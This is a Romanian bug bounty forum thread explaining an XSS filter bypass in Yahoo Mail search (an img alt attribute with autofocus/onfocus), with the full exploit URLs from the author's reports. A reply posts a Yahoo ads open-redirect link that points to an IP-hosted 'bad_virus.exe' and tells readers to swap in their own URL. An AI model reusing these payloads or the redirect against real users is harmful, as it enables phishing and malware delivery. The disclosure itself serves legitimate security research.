Jump to content
SilenTx0

[XSS] Yahoo Mail

By SilenTx0, in Bug Bounty

Recommended Posts

SilenTx0 Newbie

SilenTx0

Posted
Posted (edited)

RX7VNEV.png

No user-interaction: <img alt=" autofocus=true onfocus=alert(1) a="">

De ce am folosit acest vector? Pentru ca, daca puneam <img src=x onerror=alert(1)> imi stergea onerror=alert(1) (sau orice event handler as fi folosit). Dupa mai multe incercari de a face bypass, am observat ca imi lasa atributul alt si src. Prin src n-am reusit sa fac nimic asa ca m-am folosit de atributul alt. Am vazut ca daca eu pun space in interiorul valorii atributului alt, automat se pun ghilimele unde gaseste primul space. Acum, in sursa arata cam asa:

<input class="uh-srch-box" autofocus=true onfocus=alert(1) value="<img alt=" name="s">

De ce autofocus=true? Daca as fi pus doar autofocus, mi s-ar fi adaugat ="" pentru ca scriptul verifica daca toate atributele au o valoare. In cazul in care un atribut nu avea o valoare, el adauga de la sine ="" iar vectorul meu nu ar mai functionat(fara interactiunea userului).

Edited by SilenTx0
  • Upvote 1
Link to comment
Share on other sites
SilenTx0 Newbie

SilenTx0

Posted
  • Author
Posted
Dar cum au rezolvat atunci si acum ai gasit iar? :)

Stii si tu cum sunt astia de la yahoo...

Ei au redenumit aplicatia care facea cautarea din searchnew in search in loc sa foloseasca o functie care sa filtreze datele (Yahoo style).

Adevarat ca daca dadeam click pe link-ul care l-am trimis in primul raport, xss-ul nu mergea dar daca bagam vectorul direct in search, functiona perfect.

La fel am patit si cu un bug in maps.yahoo.com. Initial am primit duplicate, l-am raportat din nou si am primit valid:)).

Link-ul dat la primul raport(duplicate): https://us-mg6.mail.yahoo.com/neo/b/searchnew?s=<img+alt="+autofocus=true+onfocus=alert(1)+a="">&fid=%40S%40Search&srchWebUrl=http://search.yahoo.com/search?fr=ush-mail&srchMail=Search+Mail

Link-ul dat la al doilea raport(valid): https://us-mg6.mail.yahoo.com/neo/b/search?s=<img+alt="+autofocus=true+onfocus=alert(1)+a="">&fid=%40S%40Search&srchWebUrl=http://search.yahoo.com/search?fr=ush-mail&srchMail=Search+Mail

Link to comment
Share on other sites
yo20063 Newbie

yo20063

Posted
Posted

Won't fix :)

https://ads.yahoo.com/clk?3,eJytjdEKgjAYhZ-mOxE3Z1tIF78tQWmW0Ygu1WWm1oIE0advgdUL9HEuzuE.hx-5vuNSRhjBOM.VPM8yHxEP07JUJWKW4.smL4iD6IJiqz1rDTvFBHDRuCyAN5FMix4-JDlEk5UAKYTrxx32053KVQJ.gbMmkJM3.y5GnIGnqB07MvjVqjYZ0zEZ5bA5xleBRScOYSsGdN1yiTYHdTvVEm953Ii6IOLyXS4tq-q6x3PmwgyHRn3f20NWaW0X-mbyC-CRWOg=,$http://193.27.70.11/bad_virus.exe

Pentru a il folosi doar modificati url de la final :)

Ps: merge de 3 luni incoace

Link to comment
Share on other sites
SilenTx0 Newbie

SilenTx0

Posted
  • Author
Posted
Won't fix :)

https://ads.yahoo.com/clk?3,eJytjdEKgjAYhZ-mOxE3Z1tIF78tQWmW0Ygu1WWm1oIE0advgdUL9HEuzuE.hx-5vuNSRhjBOM.VPM8yHxEP07JUJWKW4.smL4iD6IJiqz1rDTvFBHDRuCyAN5FMix4-JDlEk5UAKYTrxx32053KVQJ.gbMmkJM3.y5GnIGnqB07MvjVqjYZ0zEZ5bA5xleBRScOYSsGdN1yiTYHdTvVEm953Ii6IOLyXS4tq-q6x3PmwgyHRn3f20NWaW0X-mbyC-CRWOg=,$http://193.27.70.11/bad_virus.exe

Pentru a il folosi doar modificati url de la final :)

Ps: merge de 3 luni incoace

Nu mai dau bani pe Open Redirect de la inceputul anului :)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...